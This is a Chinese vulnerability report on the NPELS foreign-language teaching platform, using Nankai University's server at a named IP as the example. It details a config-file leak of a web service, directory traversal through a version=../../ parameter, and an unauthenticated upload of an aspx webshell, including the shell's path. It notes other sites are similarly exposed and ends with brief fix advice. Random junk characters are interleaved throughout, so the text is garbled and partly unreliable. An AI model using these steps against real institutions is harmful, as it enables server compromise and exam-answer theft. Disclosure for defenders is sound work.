好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中6 o2 g0 q/ ^/ a! o
3 a4 L" |. w. r, R4 O& E
详细说明:3 A# s0 x, R/ V, d
}* I7 c& l- w7 r' v
以南开大学的为例:
: F( K( L# k% Yhttp://222.30.60.3/NPELS% Y! {8 t1 Q- R( u2 R
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址) \4 v' I+ h4 f3 f$ ]2 @' w
<setting name="Update_CommonSvr_CommonService" serializeAs="String">; u6 K5 O: S4 {: }5 f, R- O
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
# l0 H' j @4 t</setting>! i& C" T8 ]+ X2 p* ]2 W
及版本号
1 o% d/ ~) d0 @/ K K. L3 ?9 W<add key="TVersion" value="1, 0, 0, 2187">8 \: a" P8 F6 J# X: Q$ W" _
</add>5 z3 ]( o" h" v3 T# _, k, }
直接访问: ^9 F' G& \, H
http://222.30.60.3/NPELS/CommonService.asmx) a" _! p) V" ^+ S3 G
使用GetTestClientFileList操作,直接 HTTP GET 列目录:
" o9 b9 u6 t: Uhttp://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 21870 v+ `7 @7 U; s9 o% A( {9 D
进一步列目录(返回的网页很大,可以直接 wget 下来)
" f- q: W; z3 m X+ r$ c+ ^/ Mhttp://222.30.60.3/NPELS/CommonS ... List?version=../../. }5 j3 v6 M7 o8 G- y# }2 e) m- k
% r5 S6 u5 {( k T发现
8 l8 Q- G/ `/ y9 t2 ?+ khttp://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
" v5 g$ h4 Y' @可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头0 P) i1 k. P) z$ z
上传后继续列目录找到木马地址直接访问即可
. S, x1 _' g* F" b" Y- c: v
# C$ R. h# w# F1 P0 f: {OOXX
* ]4 x$ _( A+ k, ?- f: ~& g/ a% T* ?- c 0 O% U# \& ^" a. T& t$ |# ?
Google "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法
! F4 w/ G+ |/ e7 o8 F漏洞证明:% x5 m/ }* n$ K: T
4 a) z% X$ `' n2 @1 r" [) t9 |
列目录:9 {$ v. S8 D" J' v! w6 n5 W" w7 z
http://222.30.60.3/NPELS/CommonS ... List?version=../../
9 B3 Y" b* Z/ d+ z3 a+ E8 B" r文件上传:* G, p+ n% Q3 y6 X8 Y) v
http://222.30.60.3/npelsv/editor/editor.htm, I+ l, [* \5 E( H
; J3 M; `1 l w- }9 ?/ [+ {5 B! v上传木马:
& P4 o, @0 }3 i% P: Dhttp://222.30.60.3/npelsv/editor/uploadfiles/1.aspx, c$ O. L9 Z4 N7 K, Y+ V
0 i: v6 L) p; {+ I N/ a
修复方案:, z! K' w- k5 j! }. H: [) k" J
好像考试系统必须使用 CommonService.asmx
% t% t9 R' `. H. Y) T最好配置文件加密或者用别的方式不让它泄露出来; r. R, t" a: a: O/ a8 u( C
并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样
0 _: v* B4 F1 g5 g ]* z9 v |